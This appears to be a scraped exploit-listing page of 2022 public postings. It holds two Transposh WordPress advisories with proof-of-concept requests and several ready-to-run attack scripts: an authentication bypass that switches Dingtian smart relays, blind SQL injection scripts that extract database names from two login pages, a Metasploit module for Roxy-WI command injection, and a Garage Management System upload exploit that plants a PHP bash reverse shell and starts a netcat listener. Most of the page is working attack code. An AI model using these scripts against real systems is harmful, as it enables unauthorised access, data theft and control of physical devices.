Latest exploits :: CodePwn

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/ Type: Incorrect Authorization [CWE-863] Date found: 2022-07-13 Date published: 2022-07-22 CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) CVE: CVE-2022-2461 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Transposh WordPress Translation 1.0.8.1 and below 4. INTRODUCTION =============== Transposh translation filter for WordPress offers a unique approach to blog translation. It allows your blog to combine automatic translation with human translation aided by your users with an easy to use in-context interface. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== When installed Transposh comes with a set of pre-configured options, one of these is the "Who can translate" setting under the "Settings" tab, which by default allows "Anonymous" users to add translations via the plugin's "tp_translation" ajax action. Successful exploits can allow an unauthenticated attacker to add translations to the WordPress site and thereby influence what is actually shown on the site. 6. PROOF OF CONCEPT =================== The following Proof-of-Concept adds a new translation POST /wp-admin/admin-ajax.php HTTP/2 Host: [host] Content-Length: 75 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 action=tp_translation&ln0=en&sr0=rcesecurity.com&items=1&tk0=rcesecurity.com&tr0=rcesecurity.com 7. SOLUTION =========== None. Remove the plugin to prevent exploitation. 8. REPORT TIMELINE ================== 2022-07-13: Discovery of the vulnerability 2022-07-13: CVE requested from WPScan (CNA) 2022-07-18: No response from WPScan 2022-07-18: CVE requested from Wordfence (CNA) instead 2022-07-18: Sent note to vendor 2022-07-18: Wordfence assigns CVE-2022-2461 2022-07-20: Since there are currently no plans to provide fixes at all: 2022-07-22: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/ </code></pre>

<pre><code># Exploit Title: Dingtian-DT-R002 3.1.276A - Authentication Bypass # Google Dork: NA # Date: 13th July 2022 # Exploit Author: Victor Hanna (Trustwave SpiderLabs) # Author Github Page: https://9lyph.github.io/CVE-2022-29593/ # Vendor Homepage: https://www.dingtian-tech.com/en_us/relay4.html # Software Link: https://www.dingtian-tech.com/en_us/support.html?tab=download # Version: V3.1.276A # Tested on: MAC OSX # CVE : CVE-2022-29593#!/usr/local/bin/python3 # Author: Victor Hanna (SpiderLabs) # DingTian DT-R002 2CH Smart Relay # CWE-294 - Authentication Bypass by Capture-replay import requests import re import urllib.parse from colorama import init from colorama import Fore, Back, Style import sys import os import time from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) def banner(): print ("[+]********************************************************************************[+]") print ("| Author : Victor Hanna (9lyph)["+Fore.RED + "SpiderLabs" +Style.RESET_ALL+"]\t\t\t\t\t |") print ("| Description: DingTian DT-R002 2CH Smart Relay |") print ("| Usage : "+sys.argv[0]+" <host> <relay#> |") print ("[+]********************************************************************************[+]") def main(): os.system('clear') banner() urlRelay1On = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=1&time=0&pwd=0&" urlRelay1Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=0&on=0&time=0&pwd=0&" urlRelay2On = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=1&time=0&pwd=0&" urlRelay2Off = "http://"+host+"/relay_cgi.cgi?type=0&relay=1&on=0&time=0&pwd=0&" headers = { "Host": ""+host+"", "User-Agent": "9lyph/3.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "DNT": "1", "Connection": "close", "Referer": "http://"+host+"/relay_cgi.html", "Cookie": "session=4463009" } print (Fore.YELLOW + f"[+] Exploiting" + Style.RESET_ALL, flush=True, end=" ") for i in range(5): time.sleep (1) print (Fore.YELLOW + "." + Style.RESET_ALL, flush=True, end="") try: if (relay == "1"): print (Fore.GREEN + "\n[+] Relay 1 switched on !" + Style.RESET_ALL) r = requests.get(urlRelay1On) time.sleep (5) print (Fore.GREEN + "[+] Relay 1 switched off !" + Style.RESET_ALL) r = requests.get(urlRelay1Off) print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="") elif (relay == "2"): print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL) r = requests.get(urlRelay2On) time.sleep (5) print (Fore.GREEN + "[+] Relay 2 switched on !" + Style.RESET_ALL) r = requests.get(urlRelay2Off) print (Fore.YELLOW + "PWNED !!!" + Style.RESET_ALL, flush=True, end="") else: print (Fore.RED + "[!] No such relay" + Style.RESET_ALL) except KeyboardInterrupt: sys.exit(1) except requests.exceptions.Timeout: print ("[!] Connection to host timed out !") sys.exit(1) except requests.exceptions.Timeout: print ("[!] Connection to host timed out !") sys.exit(1) except Exception as e: print (Fore.RED + f"[+] You came up short I\'m afraid !" + Style.RESET_ALL) if __name__ == "__main__": if len(sys.argv)>2: host = sys.argv[1] relay = sys.argv[2] main () else: print (Fore.RED + f"[+] Not enough arguments, please specify target and relay!" + Style.RESET_ALL) </code></pre>

<pre><code>RCE Security Advisory https://www.rcesecurity.com 1. ADVISORY INFORMATION ======================= Product: Transposh WordPress Translation Vendor URL: https://wordpress.org/plugins/transposh-translation-filter-for-wordpress/ Type: Cross-Site Scripting [CWE-79] Date found: 2021-08-19 Date published: 2022-07-22 CVSSv3 Score: 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) CVE: CVE-2021-24911 2. CREDITS ========== This vulnerability was discovered and researched by Julien Ahrens from RCE Security. 3. VERSIONS AFFECTED ==================== Transposh WordPress Translation 1.0.7 and below 4. INTRODUCTION =============== Transposh translation filter for WordPress offers a unique approach to blog translation. It allows your blog to combine automatic translation with human translation aided by your users with an easy to use in-context interface. (from the vendor's homepage) 5. VULNERABILITY DETAILS ======================== The plugin's ajax action "tp_translation" which is available to authenticated or unauthenticated users (see CVE-2022-2461) allows to submit new translations. Translations submitted this way are shown on the Transposh administrative interface on the pages "tp_main" and "tp_editor". However, since the plugin does not properly validate and sanitize the submitted translation, arbitrary Javascript code can be permanently injected and executed directly within the backend across all users visiting the page with the roles of at least "Subscriber" and up to "Administrator". This offers a wide range of possible attacks, such as redirecting the user to a malicious page, spoofing content on the page, or attacking the browser and its plugins. 6. PROOF OF CONCEPT =================== The following PoC adds a new translation: <html> <body> <form action="http://[host]/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="tp_translation" /> <input type="hidden" name="ln0" value="en" /> <input type="hidden" name="sr0" value="0" /> <input type="hidden" name="items" value="1" /> <input type="hidden" name="tk0" value="xss<script>alert(1337)</script>" /> <input type="hidden" name="tr0" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html> 7. SOLUTION =========== Update the plugin to version 1.0.8.1 8. REPORT TIMELINE ================== 2021-08-19: Discovery of the vulnerability 2021-08-20: Contacted the vendor via their contact form 2021-08-20: Vendor response 2021-08-20: Sent all the PoC exploits 2021-08-20: Vendor acknowledges the issues 2021-09-14: Requested status update from vendor 2021-10-07: No response from vendor, requested status update again 2021-10-25: CVE requested from WPScan (CNA) 2021-10-27: WPScan assigns CVE-2021-24911 2022-02-22: Vendor releases 1.0.8, which fixes this vulnerability 2022-07-22: Public disclosure 9. REFERENCES ============= https://github.com/MrTuxracer/advisories https://transposh.org/version-1-0-8-thanks-julien/ https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/ </code></pre>

<pre><code># Exploit Title: Loan Management System - SQL Injection via login page # Date: 28/07/2022 # Exploit Author: saitamang # Vendor Homepage: sourcecodester # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/LMS.zip # Version: 1.0 # Tested on: Centos 7 apache2 + MySQL # The attack vector for the SQL Injection happened at the login page. The login can be bypass using the boolean payload below to gain access as Admin as the highest privileges. # Payload --> 'or 2=2# # The python script to get the database name from SQL Injection Vulnerability can be execute below. import requests, string, sys, warnings, time, concurrent.futures from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter('ignore',InsecureRequestWarning) dbname = '' req = requests.Session() def login(ip,username,password): target = "http://%s/LMS/login.php" %ip data = {'username': username,'password':password, 'login':''} response = req.post(target, data=data) if 'Login Successful' in response.text: print("[$] Success Login with credentials "+username+":"+password+"") else: print("[$] Failed Login with credentials "+username+":"+password+"") def check_injection(): # library inj test_query0 = "'or 1=2#" test_query1 = "'or 2=2#" target = "http://%s/LMS/login.php" %ip result = "" for i in range(2): if i==0: data = {'username': test_query0,'password':password, 'login':''} response = req.post(target, data=data) if response.text=="success": result = response.text else: pass if i==1: data = {'username': test_query1,'password':password, 'login':''} response = req.post(target, data=data) if response.text=="success": result = response.text else: pass if result=="<script>alert('Login Successful')</script><script>window.location='home.php'</script>": print("[##] SQLI Boolean-Based Present at password field :)") else: print("[##] No SQLI :)") def brute(dbname,password): target = "http://%s/LMS/login.php" %ip l=0 # checking length of dbname star with i = 1 for i in (n+1 for n in range(9)): payload = "'or 2=2 and length(database())='"+ str(i) +"'#" #print(payload) data = {'username': payload,'password':password, 'login':''} response = req.post(target, data=data) result = response.text #print(result) if result=="<script>alert('Login Successful')</script><script>window.location='home.php'</script>": print("[##] The correct length of DB name is "+str(i)) l=i break else: print("[##] The length of DB name "+str(i)+" is wrong") pass char = [char for char in string.ascii_lowercase] char.append('_') #print(char) dbname = [] for i in range(l): for j in char: payload = "'or 2=2 and substring(database()," + str(i+1) + ",1)='" + str(j) +"'#" data = {'username': payload,'password':password, 'login':''} response = req.post(target, data=data) result = response.text #print(payload) #print(result) if result=="<script>alert('Login Successful')</script><script>window.location='home.php'</script>": dbname.append(j) print("[+] The " + str(i+1) + " char of DB name is "+str(j)) break else: pass dbname = ''.join(dbname) print("[+] Database name retrieved --> "+dbname) print("[+] Bypass completed :)") print("[+] Bypass payload can be used is \n'or 2=2#") username = "'or 2=2#" print("\nRetry to login with new payload in password field") login(ip,username,password) if __name__ == "__main__": print(" _____ _ __ ") print(" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _") print(" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/") print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ") print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ") print(" /____/ \n\n") try: ip = sys.argv[1].strip() username = sys.argv[2].strip() password = sys.argv[3].strip() login(ip,username,password) check_injection() brute(dbname,password) except IndexError: print("[-] Usage %s <ip> <username> <password>" % sys.argv[0]) print("[-] Example: %s 192.168.149.130 admin admin123" % sys.argv[0]) sys.exit(-1) </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Roxy-WI Prior to 6.1.1.0 Unauthenticated Command Injection RCE', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. Roxy-WI is an interface for managing HAProxy, Nginx and Keepalived servers. }, 'License' => MSF_LICENSE, 'Author' => [ 'Nuri Çilengir <nuri[at]prodaft.com>', # Author & Metasploit module ], 'References' => [ ['URL', 'https://pentest.blog/advisory-roxywi-unauthenticated-remote-code-execution-cve-2022-3113/'], # Advisory ['URL', 'https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-53r2-mq99-f532'], # Additional Information ['URL', 'https://github.com/hap-wi/roxy-wi/commit/82666df1e60c45dd6aa533b01a392f015d32f755'], # Patch ['CVE', '2022-31137'] ], 'DefaultOptions' => { 'SSL' => true, 'WfsDelay' => 25 }, 'Platform' => %w[unix linux], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Unix (In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :in_memory } ], [ 'Linux (Dropper)', { 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :dropper } ] ], 'CmdStagerFlavor' => ['printf'], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2022-07-06', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']) ] ) end def execute_command(cmd, _opts = {}) return send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'app', 'options.py'), 'vars_post' => { 'serv' => '127.0.0.1', 'ipbackend' => "\"; #{cmd} ;#", 'alert_consumer' => Rex::Text.rand_text_alpha_lower(7), 'backend_server' => '127.0.0.1' } }, 10 ) rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT return nil end def check print_status("Checking if #{peer} is vulnerable!") res = execute_command('id') return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res if res.code == 200 && res.body =~ /uid=\d+$.+$/ print_status("#{peer} is vulnerable!") return CheckCode::Vulnerable('The device responded to exploitation with a 200 OK and test command successfully executed.') elsif res.code == 200 return CheckCode::Unknown('The target did respond 200 OK response however it did not contain the expected payload.') else return CheckCode::Safe("The #{peer} did not respond a 200 OK response and the expected response, meaning its not vulnerable.") end end def exploit print_status('Exploiting...') case target['Type'] when :in_memory execute_command(payload.encoded) when :dropper execute_cmdstager end end end </code></pre>

<pre><code># Exploit Title: Hospital Information System - SQL Injection via login page # Date: 25/07/2022 # Exploit Author: saitamang # Vendor Homepage: https://code-projects.org # Software Link: https://download-media.code-projects.org/2019/11/HOSPITAL_INFORMATION_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip # Version: 1.0 # Tested on: Centos 7 apache2 + MySQL import requests, string, sys, warnings, time, concurrent.futures from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter('ignore',InsecureRequestWarning) dbname = '' req = requests.Session() def login(ip,username,password): target = "http://%s/HIS/includes/users/UsersController.php" %ip data = {'type':'login','username':username,'password':password} response = req.post(target, data=data) if 'success' in response.text: print("[$] Success Login with credentials "+username+":"+password+"") else: print("[$] Failed Login with credentials "+username+":"+password+"") def check_injection(): # library inj test_query0 = "'or 1=2#" test_query1 = "'or 1=1#" target = "http://%s/HIS/includes/users/UsersController.php" %ip result = "" for i in range(2): if i==0: data = {'type':'login','username':username,'password':test_query0} response = req.post(target, data=data) if response.text=="success": result = response.text else: pass if i==1: data = {'type':'login', 'username':username,'password':test_query1} response = req.post(target, data=data) if response.text=="success": result = response.text else: pass if result=="success": print("[##] SQLI Boolean-Based Present at password field :)") else: print("[##] No SQLI :)") def brute(dbname): target = "http://%s/HIS/includes/users/UsersController.php" %ip l=0 no = [int(a) for a in str(string.digits)] # checking length of dbname for i in no: # 0-9 payload = "'or 1=1 and length(database())='"+ str(i) +"'#" #print(payload) data = {'type':'login','username':username,'password':payload} response = req.post(target, data=data) result = response.text if result=="success": print("[##] The correct length of DB name is "+str(i)) l=i break else: print("[##] The length of DB name "+str(i)+" is wrong") pass char = [char for char in string.ascii_lowercase] dbname = [] for i in range(l): for j in char: payload = "'or 1=1 and substring(database()," + str(i+1) + ",1)='" + str(j) +"'#" data = {'type':'login','username':username,'password':payload} response = req.post(target, data=data) result = response.text if result=="success": dbname.append(j) print("[+] The " + str(i+1) + " char of DB name is "+str(j)) break else: pass dbname = ''.join(dbname) print("[+] Database name retrieved --> "+dbname) print("[+] Bypass completed :)") print("[+] Bypass payload can be used is \n'or 1=1#") password = "'or 1=1#" print("\nRetry to login with new payload in password field") login(ip,username,password) if __name__ == "__main__": print(" _____ _ __ ") print(" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _") print(" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/") print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ") print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ") print(" /____/ \n\n") try: ip = sys.argv[1].strip() username = sys.argv[2].strip() password = sys.argv[3].strip() login(ip,username,password) check_injection() brute(dbname) except IndexError: print("[-] Usage %s <ip> <username> <password>" % sys.argv[0]) print("[-] Example: %s 192.168.100.x admin admin123" % sys.argv[0]) sys.exit(-1) </code></pre>

<pre><code># Exploit Title: Garage Management System Remote Code Execution via File Upload # Date: 24/07/2022 # Exploit Author: saitamang # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/garage.zip # Version: 1.0 # Tested on: Centos 7 + MySQL import requests, subprocess, string, sys, warnings, time, concurrent.futures from requests.packages.urllib3.exceptions import InsecureRequestWarning warnings.simplefilter('ignore',InsecureRequestWarning) from netifaces import interfaces, ifaddresses, AF_INET req = requests.Session() proxies = { 'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080', } def login(ip,username,password): target = "http://%s/garage/garage/login.php" %ip data = {'username':username,'password':password, 'login':''} response = req.post(target, data=data) if 'Login Successfully' in response.text: print("[$] Success Login :)") trigger_rce(req) else: print("[$] Failed Login :(") def creata_rs(): for ifaceName in interfaces(): addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr':'No IP addr'}] )] if ifaceName=="eth0": ipadd = ' '.join(addresses) f = open("saitamang.php", "w") payload = "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+str(ipadd)+"/1234 0>&1'\")?>" f.write(payload) f.close() else: pass def trigger_rce(req): creata_rs() target = "http://%s/garage/garage/php_action/createProduct.php" %ip multipart_form_data = { "currnt_date": (None,""), "productImage": ("saitamang.php", open("saitamang.php", "rb")), "productName" : (None,"test"), "quantity" : (None,"1"), "rate" : (None,"1"), "brandName" : (None,"1"), "categoryName" : (None,"1"), "productStatus" : (None,"1"), "create" : (None,"") } response = req.post(target, files=multipart_form_data) print("[$] Enjoy your RCE :)") req.get("http://%s/garage/garage/assets/myimages/saitamang.php" %ip) if __name__ == "__main__": print(" _____ _ __ ") print(" / ___/____ _(_) /_____ _____ ___ ____ _____ ____ _") print(" \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/") print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ") print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, / ") print(" /____/ \n\n") try: ip = sys.argv[1].strip() username = "mayuri.infospace@gmail.com" password = "rootadmin" subprocess.call(['terminator', '-e', 'nc -lvp 1234']) time.sleep(2) login(ip,username,password) except IndexError: print("[-] Usage %s <ip>" % sys.argv[0]) print("[-] Example: %s 192.168.100.x" % sys.argv[0]) sys.exit(-1) </code></pre>